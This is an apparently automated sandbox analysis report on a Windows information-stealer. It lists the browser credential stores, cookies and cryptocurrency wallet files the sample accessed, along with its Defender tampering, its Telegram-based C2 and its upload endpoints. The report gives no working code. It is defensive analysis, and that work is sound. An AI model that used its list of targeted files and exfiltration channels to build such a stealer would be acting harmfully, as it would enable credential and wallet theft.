              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.defaultJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              4
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              21
              Obfuscated Files or Information
              Security Account Manager48
              System Information Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              21
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              11
              Software Packing
              NTDS151
              Security Software Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets2
              Process Discovery
              SSHKeylogging4
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
              Virtualization/Sandbox Evasion
              Proc Filesystem1
              System Network Configuration Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487425 Sample: #U202f#U202f#U2005#U00a0.scr.exe Startdate: 04/08/2024 Architecture: WINDOWS Score: 100 67 api.telegram.org 2->67 69 ip-api.com 2->69 83 Antivirus / Scanner detection for submitted sample 2->83 85 Sigma detected: Capture Wi-Fi password 2->85 87 Multi AV Scanner detection for submitted file 2->87 91 12 other signatures 2->91 11 #U202f#U202f#U2005#U00a0.scr.exe 61 2->11         started        signatures3 89 Uses the Telegram API (likely for C&C communication) 67->89 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 55 other files (none is malicious) 11->61 dropped 107 Very long command line found 11->107 109 Modifies Windows Defender protection settings 11->109 111 Adds a directory exclusion to Windows Defender 11->111 113 2 other signatures 11->113 15 #U202f#U202f#U2005#U00a0.scr.exe 1 72 11->15         started        signatures6 process7 dnsIp8 71 api.telegram.org 149.154.167.220, 443, 57967 TELEGRAMRU United Kingdom 15->71 73 ip-api.com 208.95.112.1, 57966, 80 TUT-ASUS United States 15->73 75 Very long command line found 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 6 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 24 other processes 15->26 signatures9 process10 signatures11 93 Suspicious powershell command line found 19->93 95 Very long command line found 19->95 97 Encrypted powershell cmdline option found 19->97 105 3 other signatures 19->105 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        99 Modifies Windows Defender protection settings 22->99 33 powershell.exe 23 22->33         started        41 2 other processes 22->41 43 2 other processes 24->43 101 Adds a directory exclusion to Windows Defender 26->101 103 Tries to harvest and steal WLAN passwords 26->103 35 getmac.exe 26->35         started        37 powershell.exe 26->37         started        39 systeminfo.exe 26->39         started        46 45 other processes 26->46 process12 file13 115 Loading BitLocker PowerShell Module 28->115 117 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 35->117 119 Writes or reads registry keys via WMI 35->119 63 C:\Users\user\AppData\...\xuxqeuoy.cmdline, Unicode 43->63 dropped 48 csc.exe 43->48         started        65 C:\Users\user\AppData\Local\Temp\QzNtG.zip, RAR 46->65 dropped signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\xuxqeuoy.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              #U202f#U202f#U2005#U00a0.scr.exe71%ReversingLabsWin64.Trojan.Malgent
              #U202f#U202f#U2005#U00a0.scr.exe73%VirustotalBrowse
              #U202f#U202f#U2005#U00a0.scr.exe100%AviraHEUR/AGEN.1351111
              #U202f#U202f#U2005#U00a0.scr.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd2%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
              No Antivirus matches
              SourceDetectionScannerLabelLink
              ip-api.com0%VirustotalBrowse
              api.telegram.org2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://www.avito.ru/0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://www.ctrip.com/0%URL Reputationsafe
              https://www.ctrip.com/0%URL Reputationsafe
              https://www.leboncoin.fr/0%URL Reputationsafe
              https://tools.ietf.org/html/rfc2388#section-4.40%URL Reputationsafe
              https://weibo.com/0%URL Reputationsafe
              https://www.msn.com0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://www.reddit.com/0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.amazon.ca/0%URL Reputationsafe
              https://www.ebay.co.uk/0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              https://www.ebay.de/0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://www.amazon.com/0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://httpbin.org/0%URL Reputationsafe
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://www.youtube.com/0%URL Reputationsafe
              https://allegro.pl/0%URL Reputationsafe
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%URL Reputationsafe
              https://MD8.mozilla.org/1/m0%URL Reputationsafe
              https://github.com/Blank-c/BlankOBF0%Avira URL Cloudsafe
              https://bugzilla.mo0%URL Reputationsafe
              http://tools.ietf.org/html/rfc6125#section-6.4.30%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
              https://api.telegram.org/bot0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://www.python.org/download/releases/2.3/mro/.0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
              https://account.bellmedia.c0%URL Reputationsafe
              http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-60%URL Reputationsafe
              https://login.microsoftonline.com0%URL Reputationsafe
              http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
              https://www.ifeng.com/0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://ocsp.thawte.com00%URL Reputationsafe
              https://json.org0%URL Reputationsafe
              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%Avira URL Cloudsafe
              https://github.com/urllib3/urllib3/issues/2920px0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%VirustotalBrowse
              https://duckduckgo.com/ac/?q=0%VirustotalBrowse
              http://www.microsoftILEEX~1.LNKy./0%Avira URL Cloudsafe
              https://api.anonfiles.com/upload1%VirustotalBrowse
              https://discord.com/api/v9/users/0%Avira URL Cloudsafe
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
              http://cacerts.digi0%Avira URL Cloudsafe
              https://github.com/urllib3/urllib3/issues/2920px0%VirustotalBrowse
              https://discord.com/api/v9/users/0%VirustotalBrowse
              https://github.com/Blank-c/BlankOBF2%VirustotalBrowse
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%VirustotalBrowse
              http://www.microsoftISPLA~1.PNGy.0%Avira URL Cloudsafe
              https://peps.python.org/pep-0205/0%Avira URL Cloudsafe
              https://api.telegram.org/bot1%VirustotalBrowse
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%Avira URL Cloudsafe
              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%VirustotalBrowse
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
              https://github.com/python/cpython/issues/86361.0%Avira URL Cloudsafe
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%VirustotalBrowse
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://www.microsoftRUSTT~2JSOy./0%Avira URL Cloudsafe
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%VirustotalBrowse
